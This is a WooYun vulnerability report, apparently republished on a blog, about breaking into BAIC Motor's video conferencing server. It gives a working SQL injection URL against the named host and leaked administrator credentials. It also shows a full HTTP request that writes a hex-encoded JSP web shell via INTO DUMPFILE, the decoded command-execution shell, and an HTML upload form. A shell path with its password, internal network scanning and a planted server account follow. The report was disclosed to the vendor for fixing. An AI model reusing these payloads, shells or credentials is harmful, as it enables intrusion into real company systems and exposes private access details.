我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

2017年4月16日19:18:37评论233 views字数 239阅读0分47秒阅读模式

摘要

2016-04-04：细节已通知厂商并且等待厂商处理中
2016-04-05：厂商已经确认，细节仅向厂商公开
2016-04-15：细节向核心白帽子及相关领域专家公开
2016-04-25：细节向普通白帽子公开
2016-05-05：细节向实习白帽子公开
2016-05-20：细节向公众公开

漏洞概要关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-192291

漏洞标题：我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

漏洞作者： DeadSea

提交时间： 2016-04-04 22:16

公开时间： 2016-05-20 10:50

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

2人收藏

漏洞详情

披露状态：

简要描述：

mark

详细说明：

测试目标

code 区域

http://video.baicmotor.com

发现是V2视频会议系统

于是乎在乌云搜索了下。发现有人提交过一个sql注入外加getshell

code 区域

http://******/bugs/wooyun-2010-0143276

注入出了root权限账户

code 区域

http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23

然后放到sqlmap跑下后面加个leve 2 才能跑的出来，感谢zone的小伙伴出的主意

root权限。

在跑下管理员帐号

code 区域

admin/baic12345678

成功进入后

让我们研究研究getshell

code 区域

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
 Host: video.baicmotor.com
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: text/plain; charset=utf-8
 Content-Length: 1171
 
 Cookie: JSESSIONID=804BDEBF691850876C7B73972FE2024B; Hm_lvt_74a2fe33808be9e788342930391b2bf4=1459677986; JSESSIONID=FE67B91450FF759C19F39F7C8FBBA097
 Connection: keep-alive
 
 sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23

这段代码的意思就是把cmd.jsp写入root目录因为都是默认的

我想上传一句话，这个我弄了半天。最后才知道他是利用了16位进制加密

code 区域

3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E

解密后是

code 区域

<%@ page contentType="text/html; charset=GBK" %>
 <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"/r/n"; } } catch(IOException e) { e.printStackTrace(); } } 
 out.println(output);%>

然后我就屁颠屁颠的跑去找了个jsp的一句话

发现各种加密后上传不上去全是500

然后想到了，可以利用html写个poc

code 区域

<form action="http://video.baicmotor.com/7.jsp?f=1.jsp" method="post"> <textarea name=c cols=120 rows=10 width=45>your code</textarea><BR><center><br> <input type=submit 
 
 value="提交"> </form>

直接写入，

code 区域

http://video.baicmotor.com/s.jsp

密码023

然后就是提权了

幸福来的太突然了，sy权限，我呵呵了。你以为就这么简单吗？

内网呀，大兄弟。我连内网是什么都不懂，所以问了几个朋友。跟我说了一些之后就操刀上马

先转发端口到自己的服务器上

在开启扫描器各种扫内网IP 10.10.1.1~10.10.1.255

内部OA

内部管理系统

防泄漏系统

还有122个内部系统就不一一贴出来了

服务器帐号sea$ 密码sea 管理员记得删除

漏洞证明：

修复方案：

打补丁

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-04-05 10:44

厂商回复：

感谢你的努力。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-06 01:04 | DeadSea ( 普通白帽子 | Rank:284 漏洞数:63 | 本人外形俊朗、眉清目秀、玉树临风、有明星...)

1

告诉我为何只有5rank

1# 回复此人
2016-04-25 10:52 | 小红猪 ( 普通白帽子 | Rank:341 漏洞数:62 | little red pig!)

0

感谢你的努力

2# 回复此人

漏洞概要 关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-192291

漏洞标题： 我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

相关厂商： www.baicmotor.com

漏洞作者： DeadSea

提交时间： 2016-04-04 22:16

公开时间： 2016-05-20 10:50

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(12) 关注此漏洞

漏洞标题：我是如何测试北京汽车一系列内部服务安全的（dba权限/root帐号/内网遨游）

危害等级：高

漏洞状态：厂商已经确认

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分